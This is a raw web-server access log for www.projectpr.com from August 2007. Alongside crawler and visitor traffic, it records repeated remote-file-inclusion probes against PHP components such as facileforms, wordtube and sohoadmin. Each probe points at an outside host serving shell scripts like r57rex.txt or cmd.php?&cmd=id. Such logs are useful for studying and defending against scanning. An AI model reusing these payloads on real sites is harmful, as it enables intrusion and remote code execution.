208.66.194.5 - - [18/Aug/2007:06:32:31 -0700] "GET /logs/access.log HTTP/1.1" 200 448919 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.25.202 - - [18/Aug/2007:06:35:59 -0700] "GET /logs/access_061212.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:06:50:31 -0700] "GET /logs/access.log HTTP/1.1" 200 449254 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:07:12:58 -0700] "GET /logs/access.log HTTP/1.1" 200 449389 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
202.160.178.87 - - [18/Aug/2007:07:23:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
202.160.179.36 - - [18/Aug/2007:07:24:10 -0700] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:07:31:29 -0700] "GET /logs/access.log HTTP/1.1" 200 449945 "-" "Googlebot-Image/1.0" "www.projectpr.com"
212.241.213.247 - - [18/Aug/2007:07:41:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://limbo.rentahost.ch/modules/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.193.194 - - [18/Aug/2007:07:41:47 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:07:50:32 -0700] "GET /logs/access.log HTTP/1.1" 200 450529 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
212.241.193.194 - - [18/Aug/2007:07:56:02 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.241.213.247 - - [18/Aug/2007:07:56:02 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://limbo.rentahost.ch/modules/robots.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.193.194 - - [18/Aug/2007:07:56:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.241.213.247 - - [18/Aug/2007:07:56:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://limbo.rentahost.ch/modules/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:08:09:13 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:08:09:18 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:08:09:44 -0700] "GET /logs/access.log HTTP/1.1" 200 451972 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:08:27:53 -0700] "GET /logs/access.log HTTP/1.1" 200 452160 "-" "Googlebot-Image/1.0" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:08:29:41 -0700] "GET /logs/access.log/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:08:45:58 -0700] "GET /logs/access.log HTTP/1.1" 200 452466 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
65.98.105.162 - - [18/Aug/2007:09:03:31 -0700] "GET /logs/access.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.98.105.162 - - [18/Aug/2007:09:03:32 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.98.105.162 - - [18/Aug/2007:09:03:32 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:09:04:43 -0700] "GET /logs/access.log HTTP/1.1" 200 453419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:13:57 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd HTTP/1.1" 200 10036 "http://us.f551.mail.yahoo.com/ym/ShowLetter?MsgId=715_0_3102_1317_918_0_3683_1668_2410615068_oSOYkYn4Ur6Rg9euJfSMZ2XJUpXy9M8ud7zxUFO7KUwzcblQTm2SrUvuIDCO_k6E4BdoS6RGscwaYXM74zOSXvDcd.Bdh2tsQXT4rQHBAFYYePGW0a49v8Gw68e68u.w.MJ0tTPDoW1rG1RStFq49RsHWIc3bcJX6DKzNKw1Co4-&Idx=9&YY=73529&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=%40B%40Bulk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:13:58 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:13:58 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:13:59 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:00 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:00 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:00 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:01 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:01 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/Z39FP1o4b1RCOmhd" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
85.204.25.32 - - [18/Aug/2007:09:14:01 -0700] "GET /favicon.ico HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:09:24:01 -0700] "GET /logs/access.log HTTP/1.1" 200 456392 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:09:26:41 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:09:26:46 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 269 "-" "libwww-perl/5.48" "www.projectpr.com"
81.72.3.35 - - [18/Aug/2007:09:39:46 -0700] "GET /logs/access.log///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 311 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:09:44:02 -0700] "GET /logs/access.log HTTP/1.1" 200 457154 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
88.229.87.173 - - [18/Aug/2007:09:50:53 -0700] "GET /components/com_flyspray/startdown.php?file=http://indir.savsak.com/shell.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:09:52:21 -0700] "GET /logs/access.log/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 285 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:10:04:34 -0700] "GET /logs/access.log HTTP/1.1" 200 457722 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:13 -0700] "GET /logs/access.log//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:13 -0700] "GET //plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:14 -0700] "GET /logs//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:32 -0700] "GET /logs/access.log//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:32 -0700] "GET //plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [18/Aug/2007:10:11:32 -0700] "GET /logs//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
122.152.129.54 - - [18/Aug/2007:10:19:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
81.72.3.35 - - [18/Aug/2007:10:24:35 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:10:26:07 -0700] "GET /logs/access.log HTTP/1.1" 200 459687 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.28.200 - - [18/Aug/2007:10:42:15 -0700] "GET /navigation_bars/?N=D HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:10:42:17 -0700] "GET /logs///includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:10:42:17 -0700] "GET ///includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:10:44:36 -0700] "GET /logs/access.log HTTP/1.1" 200 460455 "-" "Googlebot-Image/1.0" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:10:46:08 -0700] "GET /logs/access.log///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 311 "-" "libwww-perl/5.65" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:10:46:08 -0700] "GET ///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:10:46:08 -0700] "GET /logs///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.187.91.250 - - [18/Aug/2007:10:46:56 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/8.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:11:06:01 -0700] "GET /logs/access.log HTTP/1.1" 200 461330 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.20.235 - - [18/Aug/2007:11:06:50 -0700] "GET /clipart/?S=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:11:29:07 -0700] "GET /logs/access.log HTTP/1.1" 200 461711 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:11:53:56 -0700] "GET /logs/access.log HTTP/1.1" 200 461899 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:12:15:08 -0700] "GET /logs/access.log HTTP/1.1" 200 462087 "-" "Googlebot-Image/1.0" "www.projectpr.com"
85.88.3.18 - - [18/Aug/2007:12:32:27 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.88.3.18 - - [18/Aug/2007:12:32:27 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.88.3.18 - - [18/Aug/2007:12:32:28 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.18.27 - - [18/Aug/2007:12:37:15 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.27 - - [18/Aug/2007:12:37:15 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.27 - - [18/Aug/2007:12:37:16 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:12:41:07 -0700] "GET /logs/access.log HTTP/1.1" 200 463737 "-" "Googlebot-Image/1.0" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:12:44:12 -0700] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:12:44:12 -0700] "GET ///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
213.218.137.40 - - [18/Aug/2007:12:47:20 -0700] "GET /logs/access.log///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.218.137.40 - - [18/Aug/2007:12:47:20 -0700] "GET ///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.218.137.40 - - [18/Aug/2007:12:47:21 -0700] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
65.55.209.10 - - [18/Aug/2007:12:53:05 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
65.55.209.10 - - [18/Aug/2007:12:53:05 -0700] "GET /contactus.html HTTP/1.0" 200 12521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:12:59:43 -0700] "GET /logs/access.log HTTP/1.1" 200 465318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
209.191.87.217 - - [18/Aug/2007:13:01:05 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg+tmrwpkzkauraywhiedtoaw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
209.191.87.217 - - [18/Aug/2007:13:01:07 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg+tmrwpkzkauraywhiedtoaw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
85.214.18.27 - - [18/Aug/2007:13:01:47 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 295 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.27 - - [18/Aug/2007:13:01:47 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.88.3.18 - - [18/Aug/2007:13:05:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.88.3.18 - - [18/Aug/2007:13:05:10 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.226.57 - - [18/Aug/2007:13:13:12 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.226.57 - - [18/Aug/2007:13:13:12 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.226.57 - - [18/Aug/2007:13:13:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:13:17:56 -0700] "GET /logs/access.log HTTP/1.1" 200 467595 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:13:31:59 -0700] "GET /logs/access.log HTTP/1.1" 200 467730 "-" "Googlebot-Image/1.0" "www.projectpr.com"
65.55.209.11 - - [18/Aug/2007:13:39:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
65.55.209.11 - - [18/Aug/2007:13:39:33 -0700] "GET /aboutus.html HTTP/1.0" 200 9447 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:13:45:23 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:13:45:28 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:13:58:24 -0700] "GET /logs/access.log HTTP/1.1" 200 468609 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:14:02:49 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:14:02:49 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:14:03:39 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.29.115 - - [18/Aug/2007:14:03:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:14:13:53 -0700] "GET /logs/access.log HTTP/1.1" 200 469705 "-" "Googlebot-Image/1.0" "www.projectpr.com"
65.55.209.10 - - [18/Aug/2007:14:27:09 -0700] "GET /services.html HTTP/1.0" 200 9306 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:14:28:23 -0700] "GET /logs/access.log HTTP/1.1" 200 469998 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:14:35:08 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.borg-birkfeld.at/bibliothek/cmd.php?&cmd=id HTTP/1.1" 404 295 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:14:48:47 -0700] "GET /logs/access.log HTTP/1.1" 200 470402 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.25.205 - - [18/Aug/2007:14:50:02 -0700] "GET /sitebuilder/ HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
66.196.97.160 - - [18/Aug/2007:14:54:27 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg+vmdvvfznavrapw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
66.196.97.160 - - [18/Aug/2007:14:54:29 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg+vmdvvfznavrapw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:15:10:03 -0700] "GET /logs/access.log HTTP/1.1" 200 471117 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:15:23:57 -0700] "GET /logs/access.log HTTP/1.1" 200 471252 "-" "Googlebot-Image/1.0" "www.projectpr.com"
122.152.128.49 - - [18/Aug/2007:15:42:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:15:44:37 -0700] "GET /logs/access.log HTTP/1.1" 200 471554 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:15:46:36 -0700] "GET /logs////components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 302 "-" "libwww-perl/5.65" "www.projectpr.com"
62.141.50.122 - - [18/Aug/2007:15:46:36 -0700] "GET ////components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
65.55.209.13 - - [18/Aug/2007:15:48:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
65.55.209.13 - - [18/Aug/2007:15:48:08 -0700] "GET /index.html HTTP/1.0" 200 10036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:15:50:20 -0700] "GET /logs/access.log////components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:15:50:20 -0700] "GET ////components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.207.204.19 - - [18/Aug/2007:15:50:20 -0700] "GET /logs////components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hdsom.com.br/dvd/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
195.242.211.140 - - [18/Aug/2007:16:00:37 -0700] "GET /logs/access.log//plugins/spamx/MTBlackList.Examine.class.php?_CONF%5Bpath%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.242.211.140 - - [18/Aug/2007:16:00:37 -0700] "GET //plugins/spamx/MTBlackList.Examine.class.php?_CONF%5Bpath%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
